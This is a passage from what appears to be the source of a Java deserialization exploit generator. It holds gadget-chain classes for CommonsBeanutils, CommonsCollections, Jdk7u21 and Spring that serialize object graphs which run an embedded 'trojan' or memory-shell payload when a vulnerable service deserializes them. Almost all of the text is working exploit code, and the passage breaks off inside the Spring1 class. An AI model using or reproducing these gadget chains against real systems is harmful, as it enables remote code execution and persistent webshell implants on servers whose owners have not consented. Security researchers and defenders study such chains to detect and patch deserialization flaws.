core.gadgets; 2 | 3 | import com.sun.org.apache.xerces.internal.dom.AttrNSImpl; 4 | import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl; 5 | import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; 6 | import core.enumtypes.PayloadType; 7 | import core.gadgets.utils.Gadgets; 8 | import core.gadgets.utils.JavassistClassLoader; 9 | import core.gadgets.utils.Reflections; 10 | import core.utils.Util; 11 | import javassist.ClassClassPath; 12 | import javassist.ClassPool; 13 | import javassist.CtClass; 14 | import javassist.CtField; 15 | 16 | import java.util.Comparator; 17 | import java.util.PriorityQueue; 18 | import java.util.Queue; 19 | 20 | 21 | public class CommonsBeanutilsAttrCompare_183 { 22 | 23 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 24 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 25 | 26 | AttrNSImpl attrNS1 = new AttrNSImpl(); 27 | CoreDocumentImpl coreDocument = new CoreDocumentImpl(); 28 | attrNS1.setValues(coreDocument,"1","1","1"); 29 | 30 | ClassPool pool = ClassPool.getDefault(); 31 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 32 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 33 | try { 34 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 35 | ctBeanComparator.removeField(ctSUID); 36 | }catch (javassist.NotFoundException e){} 37 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 38 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 39 | ctBeanComparator.defrost(); 40 | Reflections.setFieldValue(beanComparator, "comparator", new AttrCompare()); 41 | 42 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 43 | // Class u = 
classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 44 | // System.out.println(u.getPackage()); 45 | 46 | 47 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new AttrCompare()); 48 | 49 | // PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 50 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 51 | 52 | 53 | queue.add(attrNS1); 54 | queue.add(attrNS1); 55 | 56 | 57 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 58 | 59 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 60 | // Reflections.setFieldValue(beanComparator, "comparator", new AttrNSImpl()); 61 | 62 | return (Queue)queue; 63 | } 64 | 65 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 66 | Object val = getObject(type, trojanType); 67 | return Util.serialize(val); 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsObjectToStringComparator.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.beanutils.BeanComparator; 8 | import org.apache.commons.lang3.compare.ObjectToStringComparator; 9 | 10 | import java.util.PriorityQueue; 11 | import java.util.Queue; 12 | 13 | 14 | public class CommonsBeanutilsObjectToStringComparator { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | 19 | ObjectToStringComparator stringComparator = new ObjectToStringComparator(); 20 | 21 | 22 | BeanComparator beanComparator = new BeanComparator(null, new 
ObjectToStringComparator()); 23 | 24 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 25 | 26 | 27 | queue.add(stringComparator); 28 | queue.add(stringComparator); 29 | 30 | 31 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 32 | 33 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 34 | 35 | return (Queue)queue; 36 | } 37 | 38 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 39 | Object val = getObject(type, trojanType); 40 | return Util.serialize(val); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsObjectToStringComparator_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | import org.apache.commons.lang3.compare.ObjectToStringComparator; 13 | 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | import java.util.Queue; 17 | 18 | 19 | public class CommonsBeanutilsObjectToStringComparator_183 { 20 | 21 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 22 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 23 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 24 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 25 | // System.out.println(u.getPackage()); 26 | // 27 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new ObjectToStringComparator() ); 28 | 29 
| ClassPool pool = ClassPool.getDefault(); 30 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 31 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 32 | try { 33 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 34 | ctBeanComparator.removeField(ctSUID); 35 | }catch (javassist.NotFoundException e){} 36 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 37 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 38 | ctBeanComparator.defrost(); 39 | Reflections.setFieldValue(beanComparator, "comparator", new ObjectToStringComparator()); 40 | 41 | ObjectToStringComparator stringComparator = new ObjectToStringComparator(); 42 | 43 | 44 | // BeanComparator beanComparator = new BeanComparator(null, new ObjectToStringComparator()); 45 | 46 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 47 | 48 | 49 | queue.add(stringComparator); 50 | queue.add(stringComparator); 51 | 52 | 53 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 54 | 55 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 56 | // Reflections.setFieldValue(beanComparator, "comparator", stringComparator); 57 | 58 | return (Queue)queue; 59 | } 60 | 61 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 62 | Object val = getObject(type, trojanType); 63 | return Util.serialize(val); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsPropertySource.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | 
import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.beanutils.BeanComparator; 8 | import org.apache.logging.log4j.util.PropertySource; 9 | 10 | import java.util.PriorityQueue; 11 | import java.util.Queue; 12 | 13 | public class CommonsBeanutilsPropertySource{ 14 | 15 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 16 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 17 | PropertySource propertySource1 = new PropertySource() { 18 | @Override 19 | public int getPriority() { 20 | return 0; 21 | } 22 | 23 | }; 24 | 25 | BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator()); 26 | 27 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 28 | 29 | queue.add(propertySource1); 30 | queue.add(propertySource1); 31 | 32 | 33 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates}); 34 | 35 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 36 | 37 | return (Queue)queue; 38 | } 39 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 40 | Object val = getObject(type, trojanType); 41 | return Util.serialize(val); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsPropertySource_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | import org.apache.logging.log4j.util.PropertySource; 13 | 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 
16 | import java.util.Queue; 17 | 18 | 19 | public class CommonsBeanutilsPropertySource_183{ 20 | 21 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 22 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 23 | PropertySource propertySource1 = new PropertySource() { 24 | @Override 25 | public int getPriority() { 26 | return 0; 27 | } 28 | 29 | }; 30 | 31 | // BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator()); 32 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 33 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 34 | // System.out.println(u.getPackage()); 35 | // 36 | //// BeanComparator beanComparator = new BeanComparator(null, new AttrCompare()); 37 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new PropertySource.Comparator()); 38 | ClassPool pool = ClassPool.getDefault(); 39 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 40 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 41 | try { 42 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 43 | ctBeanComparator.removeField(ctSUID); 44 | }catch (javassist.NotFoundException e){} 45 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 46 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 47 | ctBeanComparator.defrost(); 48 | Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator()); 49 | 50 | 51 | 52 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 53 | 54 | queue.add(propertySource1); 55 | queue.add(propertySource1); 56 | 57 | 58 | Reflections.setFieldValue(queue, 
"queue", new Object[] { templates, templates });

        // Armed last so no comparison ran with the property set while the
        // queue was being built.
        Reflections.setFieldValue(beanComparator, "property", "outputProperties");
        // Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator());

        return (Queue)queue;
    }

    /** Serializes the graph from {@link #getObject} with {@link Util#serialize}. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object val = getObject(type, trojanType);
        return Util.serialize(val);
    }
}

--------------------------------------------------------------------------------
/src/main/java/core/gadgets/CommonsBeanutilsString.java:
--------------------------------------------------------------------------------
package core.gadgets;

import core.enumtypes.PayloadType;
import core.gadgets.utils.Gadgets;
import core.gadgets.utils.Reflections;
import core.utils.Util;
import org.apache.commons.beanutils.BeanComparator;

import java.util.Comparator;
import java.util.PriorityQueue;
import java.util.Queue;


/**
 * Commons-BeanUtils deserialization gadget (PriorityQueue + BeanComparator
 * with {@code property = "outputProperties"} over two TemplatesImpl objects).
 *
 * The nested comparator is the JDK's {@link String#CASE_INSENSITIVE_ORDER},
 * so BeanComparator is the only non-JDK class in the serialized graph; the
 * placeholder elements are therefore plain Strings.
 *
 * NOTE(review): same serialVersionUID caveat as the other BeanComparator
 * variants; {@code CommonsBeanutilsString_183} exists for a different
 * commons-beanutils release.
 */
public class CommonsBeanutilsString {
    /**
     * Builds the gadget object graph.
     *
     * @param type       payload / memshell variant carried by the TemplatesImpl
     * @param trojanType forwarded unchanged to {@link Gadgets#createTemplatesImpl}
     * @return the armed PriorityQueue, returned through the Queue interface
     * @throws Exception on reflection or template-generation failure
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(type, trojanType);
        // property is null at construction; it is set reflectively at the end.
        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

        PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator);

        // Placeholder Strings so that add() succeeds; replaced below.
        queue.add("1");
        queue.add("1");

        // Swap the backing array for the two TemplatesImpl objects.
        Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates });

        // Arm last: the getter name BeanComparator reads on the target.
        Reflections.setFieldValue(beanComparator, "property", "outputProperties");

        return (Queue)queue;
    }

    /** Serializes the graph from {@link #getObject} with {@link Util#serialize}. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object val = getObject(type, trojanType);
        return Util.serialize(val);
    }
}



--------------------------------------------------------------------------------
/src/main/java/core/gadgets/CommonsBeanutilsString_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.util.Comparator; 14 | import java.util.PriorityQueue; 15 | import java.util.Queue; 16 | 17 | public class CommonsBeanutilsString_183 { 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 22 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 23 | // System.out.println(u.getPackage()); 24 | ClassPool pool = ClassPool.getDefault(); 25 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 26 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 27 | try { 28 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 29 | ctBeanComparator.removeField(ctSUID); 30 | }catch (javassist.NotFoundException e){} 31 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 32 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 33 | ctBeanComparator.defrost(); 34 | Reflections.setFieldValue(beanComparator, "comparator", String.CASE_INSENSITIVE_ORDER); 35 | 36 | // UrlClassLoaderUtils urlClassLoaderUtils = new UrlClassLoaderUtils(); 37 | // Class u = 
urlClassLoaderUtils.loadJar("").loadClass("org.apache.commons.beanutils.BeanComparator"); 38 | 39 | // Object beanComparator = u.getDeclaredConstructor(String.class,Comparator.class).newInstance(null, String.CASE_INSENSITIVE_ORDER); 40 | 41 | 42 | 43 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 44 | 45 | queue.add("1"); 46 | queue.add("1"); 47 | 48 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 49 | 50 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 51 | // Reflections.setFieldValue(beanComparator, "comparator", String.CASE_INSENSITIVE_ORDER); 52 | 53 | return (Queue)queue; 54 | } 55 | 56 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 57 | Object val = getObject(type, trojanType); 58 | return Util.serialize(val); 59 | } 60 | } 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsString_192s.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.util.Comparator; 14 | import java.util.PriorityQueue; 15 | import java.util.Queue; 16 | 17 | public class CommonsBeanutilsString_192s { 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | ClassPool pool = ClassPool.getDefault(); 21 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 22 | final CtClass beanComparator = 
pool.get("org.apache.commons.beanutils.BeanComparator"); 23 | 24 | try { 25 | CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID"); 26 | beanComparator.removeField(ctSUID); 27 | }catch (javassist.NotFoundException e){} 28 | beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator)); 29 | // mock method name until armed 30 | final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance(); 31 | beanComparator.defrost(); 32 | 33 | PriorityQueue queue = new PriorityQueue(2, (Comparator)comparator); 34 | 35 | queue.add("1"); 36 | queue.add("1"); 37 | 38 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 39 | 40 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 41 | 42 | return queue; 43 | } 44 | 45 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 46 | Object val = getObject(type, trojanType); 47 | return Util.serialize(val); 48 | } 49 | } 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollections5.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.memshell.CommandMemShell; 7 | import core.memshell.JBossListenerMemShell; 8 | 9 | import core.utils.Util; 10 | import org.apache.commons.collections.Transformer; 11 | import org.apache.commons.collections.functors.ChainedTransformer; 12 | import org.apache.commons.collections.functors.ConstantTransformer; 13 | import org.apache.commons.collections.functors.InvokerTransformer; 14 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 15 | import org.apache.commons.collections.map.LazyMap; 16 | 17 | import 
javax.management.BadAttributeValueExpException;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;


/**
 * CommonsCollections5-style gadget (commons-collections 3.x): a
 * BadAttributeValueExpException whose private {@code val} field holds a
 * TiedMapEntry over a LazyMap that is decorated with the transformer chain from
 * {@link Gadgets#createTransformers}.
 *
 * NOTE(review): the trigger relies on BadAttributeValueExpException's
 * readObject() calling toString() on the restored {@code val}, which makes
 * TiedMapEntry.toString() read the missing key through LazyMap and run the
 * chain. That is JDK / commons-collections behaviour, not visible in this
 * file; confirm against the target versions.
 * NOTE(review): the chain from createTransformers() loads its class through
 * the JDK-internal com.sun.org.apache.bcel.internal.util.ClassLoader, which
 * newer JDKs no longer ship, so this gadget is JDK-version dependent as well.
 */
public class CommonsCollections5 {

    /**
     * Builds the gadget object graph.
     *
     * @param type       payload / memshell variant (only the types handled by
     *                   {@link Gadgets#createTransformers} produce a usable chain)
     * @param trojanType forwarded unchanged to {@link Gadgets#createTransformers}
     * @return the BadAttributeValueExpException carrying the entry
     * @throws Exception on reflection failure
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        Transformer[] transformers = Gadgets.createTransformers(type, trojanType);
        Transformer transformerChain = new ChainedTransformer(transformers);
        final Map innerMap = new HashMap();

        // LazyMap computes absent values with the transformer (commons-collections semantics).
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        // "foo" is never put into innerMap, so reading the entry's value goes
        // through the LazyMap factory.
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        // The exception's val field is private; it is set reflectively so the
        // constructor does not toString() it at build time.
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        Reflections.setAccessible(valfield);
        valfield.set(val, entry);

        // NOTE(review): transformerChain was already constructed with this same
        // `transformers` array above, so this re-assignment is a no-op here. It
        // is only meaningful when the chain is first built with a placeholder
        // and armed afterwards (the pattern the trailing comment refers to).
        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

    /** Serializes the graph from {@link #getObject} with {@link Util#serialize}. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object val = getObject(type, trojanType);
        return Util.serialize(val);
    }

}

--------------------------------------------------------------------------------
/src/main/java/core/gadgets/CommonsCollections6.java:
--------------------------------------------------------------------------------
package core.gadgets;

import core.enumtypes.PayloadType;
import core.gadgets.utils.Gadgets;
import core.gadgets.utils.Reflections;
import core.utils.Util;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;


public class
CommonsCollections6 {

    /**
     * Builds a one-element HashSet whose single HashMap node has had its key
     * replaced (reflectively) by a TiedMapEntry over a LazyMap decorated with
     * the transformer chain from {@link Gadgets#createTransformers}.
     *
     * NOTE(review): the trigger relies on HashSet's deserialization
     * re-inserting the element, which hashes the TiedMapEntry key and reads
     * through LazyMap; JDK / commons-collections behaviour, not visible here.
     * The field-name fallbacks below ("backingMap", "elementData",
     * java.util.MapEntry) are for non-OpenJDK collection layouts (presumably
     * Android) and are untested in this file.
     *
     * @param type       payload / memshell variant
     * @param trojanType forwarded unchanged to {@link Gadgets#createTransformers}
     * @return the HashSet carrying the entry
     * @throws Exception on reflection failure
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception{
        Transformer[] transformers = Gadgets.createTransformers(type, trojanType);
        Transformer transformerChain = new ChainedTransformer(transformers);

        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        // "foo" is never put into innerMap, so reading the entry goes through the LazyMap factory.
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        // Placeholder element; its node's key is rewritten to `entry` below
        // instead of calling add(entry), which would hash the entry now.
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            // alternative field name on other collection implementations
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = (HashMap) f.get(map);

        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = (Object[]) f2.get(innimpl);

        // Assumes the single element landed in bucket 0 or 1 (table sized for
        // capacity 1). If it did not, `node` stays null and node.getClass()
        // below throws NullPointerException.
        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        // Overwrite the placeholder key with the TiedMapEntry; the node's
        // stored hash still belongs to "foo", which is what the tool relies on.
        Reflections.setAccessible(keyField);
        keyField.set(node, entry);

        return map;

    }

    /** Serializes the graph from {@link #getObject} with {@link Util#serialize}. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object map = getObject(type, trojanType);
        return Util.serialize(map);
    }

}

--------------------------------------------------------------------------------
/src/main/java/core/gadgets/CommonsCollectionsK1.java:
--------------------------------------------------------------------------------
package core.gadgets;


import core.utils.Util;
import
org.apache.commons.collections.functors.InvokerTransformer; 6 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 7 | import org.apache.commons.collections.map.LazyMap; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | 12 | import core.enumtypes.PayloadType; 13 | import core.gadgets.utils.Gadgets; 14 | import core.gadgets.utils.Reflections; 15 | 16 | public class CommonsCollectionsK1 { 17 | 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | Object tpl = Gadgets.createTemplatesImpl(type, trojanType); 21 | 22 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 23 | HashMap innerMap = new HashMap(); 24 | Map m = LazyMap.decorate(innerMap, transformer); 25 | 26 | Map outerMap = new HashMap(); 27 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 28 | outerMap.put(tied, "t"); 29 | // clear the inner map data, this is important 30 | innerMap.clear(); 31 | 32 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 33 | 34 | return outerMap; 35 | } 36 | 37 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 38 | Object outerMap = getObject(type, trojanType); 39 | return Util.serialize(outerMap); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollectionsK2.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | 4 | import core.utils.Util; 5 | import org.apache.commons.collections4.functors.InvokerTransformer; 6 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 7 | import org.apache.commons.collections4.map.LazyMap; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | 12 | import core.enumtypes.PayloadType; 13 | import core.gadgets.utils.Gadgets; 14 | import core.gadgets.utils.Reflections; 15 | 16 | public class 
CommonsCollectionsK2 { 17 | 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | Object tpl = Gadgets.createTemplatesImpl(type, trojanType); 21 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 22 | 23 | HashMap innerMap = new HashMap(); 24 | Map m = LazyMap.lazyMap(innerMap, transformer); 25 | 26 | Map outerMap = new HashMap(); 27 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 28 | outerMap.put(tied, "t"); 29 | // clear the inner map data, this is important 30 | innerMap.clear(); 31 | 32 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 33 | return innerMap; 34 | 35 | } 36 | 37 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 38 | Object innerMap = getObject(type, trojanType); 39 | return Util.serialize(innerMap); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/Jdk7u21.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | 8 | import javax.xml.transform.Templates; 9 | import java.lang.reflect.InvocationHandler; 10 | import java.util.HashMap; 11 | import java.util.LinkedHashSet; 12 | 13 | 14 | public class Jdk7u21 { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | 19 | String zeroHashCodeStr = "f5a5a608"; 20 | 21 | HashMap map = new HashMap(); 22 | map.put(zeroHashCodeStr, "foo"); 23 | 24 | InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 25 | Reflections.setFieldValue(tempHandler, "type", 
Templates.class); 26 | Templates proxy = Gadgets.createProxy(tempHandler, Templates.class); 27 | 28 | LinkedHashSet set = new LinkedHashSet(); // maintain order 29 | set.add(templates); 30 | set.add(proxy); 31 | 32 | Reflections.setFieldValue(templates, "_auxClasses", null); 33 | Reflections.setFieldValue(templates, "_class", null); 34 | 35 | map.put(zeroHashCodeStr, templates); // swap in real object 36 | 37 | return set; 38 | } 39 | 40 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 41 | Object set = getObject(type, trojanType); 42 | return Util.serialize(set); 43 | } 44 | 45 | 46 | } 47 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/Spring1.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.springframework.beans.factory.ObjectFactory; 8 | 9 | import javax.xml.transform.Templates; 10 | import java.lang.reflect.Constructor; 11 | import java.lang.reflect.InvocationHandler; 12 | import java.lang.reflect.Type; 13 | 14 | import static java.lang.Class.forName; 15 | 16 | public class Spring1 { 17 | 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | final ObjectFactory objectFactoryProxy = 22 | Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class); 23 | 24 | final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 25 | Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler") 26 | .newInstance(objectFactoryProxy), Type.class, Templates.class); 27 | 28 | final Object typeProviderProxy = 
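Gadgets.createMemoitizedProxy(
                Gadgets.createMap("getType", typeTemplatesProxy),
                forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

        // MethodInvokeTypeProvider(provider, method, index) is constructed with
        // the harmless Object.getClass() and the stored method name is then
        // swapped to "newTransformer" reflectively (presumably only the name is
        // kept by that class; confirm against the Spring version targeted).
        final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
        final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
        Reflections.setFieldValue(mitp, "methodName", "newTransformer");

        return mitp;
    }

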